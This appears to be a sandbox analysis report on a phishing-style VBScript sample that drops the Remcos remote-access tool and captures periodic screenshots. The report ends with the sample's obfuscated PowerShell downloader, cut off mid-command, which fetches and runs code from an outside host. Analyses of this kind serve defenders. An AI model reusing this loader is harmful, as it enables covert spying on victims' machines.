Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
REVISED NEW ORDER 7936-2024.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
||
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184000.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184100.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184200.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184302.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184404.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184504.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184614.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184715.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184815.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184915.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185015.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185115.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185215.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185316.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185417.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185517.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185617.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185718.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185818.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185918.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190018.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190118.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190218.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190318.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190419.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190519.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190619.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190719.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190819.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190919.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191019.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191119.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191219.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191319.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191419.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191519.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191620.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191720.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191820.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191920.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192020.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192120.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192220.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192320.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192420.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192520.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192620.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192721.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192821.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192921.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193021.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193121.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193221.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193321.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193421.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193521.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193621.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193721.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193821.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193921.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194022.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194122.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194222.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194322.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194422.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194522.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194622.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194722.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194822.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194922.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195023.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195123.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195223.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195323.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195423.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195523.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195623.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195723.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195823.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195923.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200023.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200124.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200224.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200324.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200424.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200524.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200624.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200724.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200824.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200924.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201024.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201124.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201224.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201324.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201425.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201525.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201625.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201725.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201825.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201925.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202025.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202125.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202225.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202325.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202425.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202525.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202625.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202726.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202827.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202927.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203027.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203127.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203228.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203328.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203428.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203528.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203628.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203728.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203828.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203928.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204028.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204128.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204228.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204328.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204429.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204530.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204630.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204730.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204830.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204931.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205031.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205131.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205231.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205331.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205431.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205531.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205631.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205732.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205833.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205935.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210035.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210135.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210236.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210336.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210436.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210536.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210636.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210736.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210836.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210937.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211037.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211138.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211238.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211338.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211438.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211538.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211638.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211738.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211839.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211940.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212040.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212140.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212240.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212340.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212441.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212541.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212641.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212741.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212843.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212943.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213043.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213143.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213243.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213344.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213444.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213544.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213646.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213746.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213846.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213946.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214046.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214146.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214247.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214349.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214449.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214549.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214649.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214749.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214850.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214950.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215052.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215155.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215256.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215356.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215456.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215559.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215659.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215759.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215900.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220000.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220102.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220202.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220302.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220403.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220505.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220605.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220706.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220806.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220908.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2s1cjq5i.guo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4iryjg50.bi0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ajeqfl5s.zwa.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivj52lbz.scn.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bhv8461.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0xf663cf20, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\peqezcketotthbxautag
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\deklaration.Sup
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
There are 213 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REVISED NEW ORDER 7936-2024.vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function
Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt
$Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function
Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge
Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro
CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0
Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er
Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr
rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/
esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg
CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals
'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft
Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio
nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl
Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4
ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden
ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe
Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend
Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide
Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb
ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredvemRestpldStartk Borem./Exo ercAuturg reoler$slith,NCuadrioRugos,nTro.fleRib,onn
GorsyvSat niiIntercoLsninguN klassUnbonn) Guin ');Ordonnant (Andelskapitals 'Bo,uso$ Flertg Ost alEksprooTonginb frankaWastlalSpartl:Re.dysBHookeri
Progrm YashmiF avrilAfb,ndlCed,ellBas eteSengetnPar lenmand,aiAlvor.aKonver=Fl,wer$Persect O flyaAvisndmIdeanfa Domi,rTjenliiInsemi.ElektrsBy.gelpEnhv.rlRice
ii BlodptAndroc( Pumic$ onoloUUn,scunFilteshJasperePate tsDelfitiJo,suntIndtegaAartietS.viori,pladevStartee DrudflHeapsoyG,tevr)
Coa,n ');$tamari=$Bimilllennia[0];Ordonnant (Andelskapitals 'Solsik$Srgemag RaphalS gregoAgathibSol.ysaMatronlE broi: MisddA.evareuNonagerAls,diisyst
mgNe.fourGela,iaLag inp Bulmeh kom,oyWhitel1.onoch6Me,rif8Civi i=.aacreNGlo,mieSub,arw B.spn-Zeal,dO R prib Kodifj UinaleAd
ptec AgermtLedni, Haplo.S curmuyPre.stsSuperatVoldtaePe nagmAlogot.SharewNE emeneFestontKlapsa.UncameW Ngst,eSa.hedbD rgekCExorcilGener,i
n wsleB.rricnOppebrtSp ndy ');Ordonnant (Andelskapitals 'Wistar$AnaeroA,ternouVandsprProaliiKuliltgBib iorAccumuaMaksimpLemu
eh IntelySydame1Pec,or6Saddel8Reetab. FortsHCircumeTrin.ta icherdPicotieNonprorS epdasFuttoc[ Brand$V,dehaSTa.ientEksploadeklarsPindsve
V,deor Bothl1Bygden1Pdofil2 ,osen].onero=Antine$ TirsdNSuffaroRulleknNedkomlForarmoUncircvStsydseSkurkerTryp,n ');$Conjuncts=Andelskapitals
'Dep avA tageuVrtdyrrStraffiManudug Fishbr limmeaVlessap St,rehVerdeny Unorm1Ablati6 Ur,ni8Uds ag.WopsboD UrbanoCerat,wEnshean
BenzilMi.dstoGalilaaAdmiradPi.kawFFragmei.orstalSt,muleHooke.(Hydato$Cataget.verdnaPolyanmPre.iaatj.nebrPersoniGlobus,Hir
in$s.ildpSBerappp radioaPornognudtrksiRhymero Stropl.ightsaDecentt.plevceRockla)Om.ind ';$Conjuncts=$baaskap[1]+$Conjuncts;$Spaniolate=$baaskap[0];Ordonnant
(Andelskapitals 'Spi,el$Afbring Hy,anlBilligo,rejerb sliskaF.gsellAlloyt:OdilesHKulturaMa blyeFiskesmForedeoIntercrStoraarLets
nh MandsaPhlebog I cini.opeienDu chygLoused= Colla(Form sTSkadegeV rslasAk,arit Humer- ManifPWallflaChondrtHadronh heter Untott$Parag
SSymmetpraveliaC oplan Tilv,iHudgenoAnalg.l .anglaVaretat.useumeUncoor),nkelt ');while (!$Haemorrhaging) {Ordonnant (Andelskapitals
'Bundsn$FilologEnthral Strepo SpectbPannela SpeedlMat,ic: naffFRed,utoha.delr GenopeGrotonsrecondtLsessoi Soranl Demo l.onirriF,udernSyzygegTrstegsBugserkMaskinr
Fras,e NoncodLnforssAnti he FamilnSy temeSp ndi= ,rawf$SkrmentForretrShellfu cullieLkkest ') ;Ordonnant $Conjuncts;Ordonnant
